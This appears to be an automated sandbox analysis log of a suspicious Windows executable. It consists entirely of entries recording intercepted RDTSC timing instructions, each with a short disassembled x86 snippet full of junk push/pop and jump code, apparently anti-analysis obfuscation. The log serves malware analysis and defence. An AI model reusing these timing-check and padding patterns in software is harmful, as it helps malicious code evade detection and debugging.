                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DCEAF4 second address: DCEB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jnc 00007F2A2C61915Ch 0x0000000e mov dword ptr [ebp+122D1C18h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F2A2C619158h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 or dl, FFFFFFC6h 0x00000034 cmc 0x00000035 popad 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F2A2C619158h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2EFCh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c pushad 0x0000005d popad 0x0000005e pop esi 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08A2 second address: DD08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2CEBE367h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08C4 second address: DD08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08C8 second address: DD08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD08CE second address: DD08D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD18DB second address: DD1958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2CEBE35Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F2A2CEBE358h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a stc 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D1B21h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F2A2CEBE358h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov ebx, 52F1B762h 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jbe 00007F2A2CEBE356h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD0AB4 second address: DD0AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD37B8 second address: DD37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57F3 second address: DD57F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57F7 second address: DD57FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD494F second address: DD4954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD57FB second address: DD5835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2A2CEBE358h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F2A2CEBE365h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2A2CEBE362h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD4954 second address: DD495A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD6894 second address: DD689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7983 second address: DD7987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7987 second address: DD798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD6A77 second address: DD6B26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F2A2C619158h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add ebx, dword ptr [ebp+122D1E24h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c xor di, 8FF9h 0x00000041 mov eax, dword ptr [ebp+122D03F9h] 0x00000047 xor ebx, dword ptr [ebp+122D2AFFh] 0x0000004d push FFFFFFFFh 0x0000004f jnp 00007F2A2C61915Ah 0x00000055 mov bx, 6542h 0x00000059 nop 0x0000005a pushad 0x0000005b pushad 0x0000005c jnc 00007F2A2C619156h 0x00000062 jmp 00007F2A2C619169h 0x00000067 popad 0x00000068 jmp 00007F2A2C61915Ah 0x0000006d popad 0x0000006e push eax 0x0000006f pushad 0x00000070 jmp 00007F2A2C619167h 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 pop eax 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8A42 second address: DD8A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8A46 second address: DD8A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7C2D second address: DD7C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD7C33 second address: DD7C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD8AE4 second address: DD8AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD9A5D second address: DD9A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F2A2C61915Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DD9A6E second address: DD9A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FDF6 second address: E0FE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FF1F second address: E0FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E131FE second address: E13211 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F2A2CEBE356h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12ACE second address: E12AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AD2 second address: E12AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 jnp 00007F2A2CEBE356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AF2 second address: E12AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AF8 second address: E12AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12C90 second address: E12CA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2A2C61915Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12CA7 second address: E12CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A2CEBE356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12CB1 second address: E12CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E16F3A second address: E16F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F2A2CEBE35Ah 0x00000011 jmp 00007F2A2CEBE363h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F884 second address: D7F889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F889 second address: D7F88E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F88E second address: D7F89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A2C619156h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F89F second address: D7F8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169AF second address: E169B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169B5 second address: E169BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169BE second address: E169C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169C8 second address: E169E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F2A2CEBE35Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169E0 second address: E169E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E16C70 second address: E16C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2A2CEBE356h 0x0000000a jmp 00007F2A2CEBE35Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DC1 second address: D82DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DC5 second address: D82DE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 js 00007F2A2CEBE356h 0x0000000f js 00007F2A2CEBE356h 0x00000015 pop ecx 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DE0 second address: D82DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2C619163h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3A4 second address: E1A3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A2CEBE35Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3B9 second address: E1A3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3BD second address: E1A3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3C1 second address: E1A3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20653 second address: E20657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20657 second address: E20662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20662 second address: E20685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A2CEBE369h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F258 second address: E1F25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3BC second address: E1F3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F2A2CEBE356h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3D7 second address: E1F3E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3E7 second address: E1F42D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A2CEBE356h 0x00000008 jmp 00007F2A2CEBE365h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F2A2CEBE368h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b push eax 0x0000001c jns 00007F2A2CEBE356h 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F42D second address: E1F433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F69F second address: E1F6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F6BB second address: E1F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F2A2C619156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6384 second address: DC638E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC638E second address: DC63C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F2A2C619169h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F2A2C619161h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F831 second address: E1F837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F837 second address: E1F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28953 second address: E28959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28959 second address: E28969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jc 00007F2A2C619156h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28969 second address: E2896E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E2896E second address: E2897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2A2C619156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E280B4 second address: E280F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F2A2CEBE356h 0x00000010 jng 00007F2A2CEBE356h 0x00000016 ja 00007F2A2CEBE356h 0x0000001c popad 0x0000001d jc 00007F2A2CEBE38Bh 0x00000023 jmp 00007F2A2CEBE361h 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push esi 0x0000002d pop esi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E283FB second address: E283FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E283FF second address: E2840F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A2CEBE356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E2840F second address: E28424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C619161h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28424 second address: E28428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E322BB second address: E322C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F2A2C619156h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E313BF second address: E313C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31555 second address: E31559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31559 second address: E31569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F2A2CEBE356h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31968 second address: E3196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3196C second address: E3198B instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2A2CEBE365h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3198B second address: E319B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2C619161h 0x0000000c jmp 00007F2A2C61915Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31C6F second address: E31C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A2CEBE35Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31F93 second address: E31F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31F99 second address: E31FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE369h 0x00000009 jmp 00007F2A2CEBE35Eh 0x0000000e popad 0x0000000f jmp 00007F2A2CEBE362h 0x00000014 pop edx 0x00000015 pushad 0x00000016 push edi 0x00000017 jnl 00007F2A2CEBE356h 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 jmp 00007F2A2CEBE35Ah 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31FEF second address: E31FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E53 second address: E38E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2A2CEBE358h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E5F second address: E38E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
